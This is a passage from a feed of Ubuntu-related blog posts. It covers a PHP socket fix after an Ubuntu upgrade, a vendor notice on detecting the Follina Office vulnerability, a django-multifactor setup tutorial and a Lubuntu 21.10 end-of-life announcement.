Fast-forward, the upgrade completed and we connect with SSH. Are are prompted to upgrade again to the next LTS, Ubuntu 20.04.
How it looks when you upgrade from a pristine Ubuntu 18.04 to Ubuntu 20.04.

Troubleshooting

You have upgraded your server but your WordPress site does not start. Why? Here’s a screenshot.

Error “502 Bad Gateway” from a WordPress website.

A WordPress website requires PHP and normally the PHP package should update automatically. It actually does update automatically. The problem is with the Unix socket for PHP. The Web server (NGINX in our case) needs access to the Unix socket of PHP. In Ubuntu the Unix socket looks like /run/php/php7.4-fpm.sock.

Ubuntu version Filename for the PHP Unix socket
Ubuntu 16.04 /run/php/php7.0-fpm.sock
Ubuntu 18.04 /run/php/php7.2-fpm.sock
Ubuntu 20.04 /run/php/php7.4-fpm.sock
The filename of the PHP Unix socket per Ubuntu version.

Therefore, you need to open the configuration file for each of your websites and edit the PHP socket directory with the updated filename for the PHP Unix socket. Here is the corrected snippet for Ubuntu 20.04.

# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location ~ .php$ {
     include snippets/fastcgi-php.conf;
     #
     # # With php7.0-cgi alone:
     # fastcgi_pass 127.0.0.1:9000;
     # With php7.0-fpm:
     fastcgi_pass unix:/run/php/php7.4-fpm.sock;
}

A request

Scaleway, if you are reading this, please have a look at this feature request.

04 June, 2022 03:51PM

June 03, 2022

hackergotchi for GreenboneOS

GreenboneOS

Follina (CVE-2022-30190): Greenbone’s Feeds Offer Protection

Once again, a flaw has surfaced in Microsoft Office that allows attackers to remotely execute malicious code on the systems of attacked users using manipulated documents. Known as Follina, CVE-2022-30190 has been known for years, but Microsoft has not fixed it to date. Greenbone has added an appropriate vulnerability test to their feeds to detect the new Follina vulnerability in Microsoft Office.

Follina (CVE-2022-30190)

Follina Requires Immediate Action

The CVE named “Follina” is critical and requires immediate action: just opening Microsoft Word documents can give attackers access to your resources. Because a flaw in Microsoft Office allows attackers to download templates from the Internet via ms-msdt:-URI handler at the first click, attackers can create manipulated documents that, in the worst case, can take over entire client systems or spy on credentials.

According to Microsoft, the “protected view” offers protection. However, because users can deactivate this with just one click, the US manufacturer advises deactivating the entire URL handler via a registry entry. As of today, all Office versions seem to be affected.

Greenbone Enterprise Feed Helps and Protects

The Greenbone Enterprise Feed and the Greenbone Community Feed now contain an authenticated check for Microsoft’s proposed workaround, helping you to protect yourself from the impact of the vulnerability. Our development team is monitoring the release of Microsoft patches and recommendations for further coverage. We will inform about updates here on the blog.

Securing IT Networks for the Long Term

If you want to know which systems in your network are (still) vulnerable to vulnerabilities – including the critical vulnerability associated with CVE-2022-30190– our vulnerability management helps you. It applies to systems that definitely need to be patched or otherwise protected. Depending on the type of systems and vulnerability, they can be found better or worse. Detection is also constantly improving and being updated. New gaps are found. Therefore, there may always be more systems with vulnerabilities in the network. Thus, it is worthwhile to regularly update and scan all systems. For this purpose, Greenbone’s vulnerability management offers appropriate automation functions.

Vulnerability management is an indispensable part of IT security. It can find risks and provides valuable information on how to eliminate them. However, no single measure, including vulnerability management, offers 100 % security. To make a system secure, many systems are used, which in their entirety should provide the best possible security.

03 June, 2022 12:59PM by Elmar Geese

hackergotchi for Ubuntu developers

Ubuntu developers

Oli Warner: Easy multifactor authentication in Django

Use django-multifactor to make your Django websites extra-secure by requiring a secondary authentication factor. Disclaimer: I made this.

django-multifactor

Three years ago a I needed to add an extra layer of security around Django Admin. Usernames and passwords and even network level limits weren’t enough. That need quickly turned brewed into django-multifactor but I’ve never blogged about it. This is a library that I now habitually install, so thought it worth mentioning just in case it helps others too. Before we get very much older, let’s answer the question that some of you might have: What is multifactor authentication?

Authentication factors come in a number of flavours; fundamentally different types of information:

  • Usernames and passwords are something you know
  • Smart cards and FIDO2 USB keys are something you have
  • Fingerprints and facial imprints are based on something you are

Multifactor authentication makes the user use more than one of these at once, and in doing so makes it far less likely that somebody can gain access with stolen credentials.

Django is a batteries-included framework. They’re great batteries too; its authentication and Admin django.contrib libraries are core requirements for a lot of my projects, but like with most framework code, it’s hard to change the behaviour. Shimming in an extra factor in the normal login flow isn’t easy.

This is where the decorator-based library django-multifactor steps up. It wraps the views you want to protect, and keeps track of its own authentication status. You can have some views with no secondary factor requirements, and some that demand two or three. It’s out of the normal authentication flow so it doesn’t need to alter how existing Django subsystems work.

Installing django-multifactor

Start by installing it (and a library to make wrapping includes easy):

pip install django-multifactor django-decorator-include

We need to make a couple of changes so your settings.py. Firstly add 'multifactor', to INSTALLED_APPS and then we’ll need to tell FIDO2 and U2F tokens what the name of our service is (ie the domain name):

MULTIFACTOR = {
'FIDO_SERVER_ID': 'example.com',
'FIDO_SERVER_NAME': 'My Django App',
'TOKEN_ISSUER_NAME': 'My Django App',
'U2F_APPID': 'https://example.com',
}

Now we just need to wrap it around the views in urls.py that we want to protect. Let’s protect the Admin:

from decorator_include import decorator_include
from multifactor.decorators import multifactor_protected

urlpatterns = [
path('admin/multifactor/', include('multifactor.urls')),
path('admin/', decorator_include(
multifactor_protected(factors=1), admin.site.urls)),
# ...
]

That’s it! Users accessing /admin/ will be bounced through /admin/multifactor/ to make sure they have enough factors. Your site is already more secure.

Taking it further

This gets you a system that allows OTP, U2F and any FIDO2 factors, with a fallback to email if they don’t have any of their installed factors to hand. On that, email is a weak factor. Many people share password between accounts and the transport can be unencrypted. It’s easy to disable the email fallback, and it’s just as easy to replace it with another more secure transport. Think everything from SMS to carrier pigeons. You can also tweak the design, or see who’s using it in UserAdmin.

The project has some miles on the clock now, and has been used in multiple production deployments of mine. It’s had help from external contributors too so I’d like to thank them all, especially @StevenMapes, for kicking my arse into gear. It’s been a weird few years.

If you think something’s missing, bug reports and PRs are very welcome. And if you can figure out a way to make this useful for django-rest-framework deployments, I welcome those suggestions on the drf bug.

But remember…

… few things withstand $5 wrenches. django-multifactor can insulate you against a lot of remote attacks but very little will secure against greed and fear. If you’re dealing with actual-important data, it’s important that you have monitored auditing in place, as well as a sensible permissions framework to ensure only the right people have access (no everyday superuser accounts!)

03 June, 2022 12:00AM

June 02, 2022

Lubuntu Blog: Lubuntu 21.10 End of Life and Current Support Statuses

Lubuntu 21.10 (Impish Indri) was released October 14, 2021 and will reach End of Life on Thursday, July 14, 2022. This means that after that date there will be no further security updates or bugfixes released. After July 14th, the only supported releases of Lubuntu will be 20.04 and 22.04. All other releases of Lubuntu will […]

02 June, 2022 11:14PM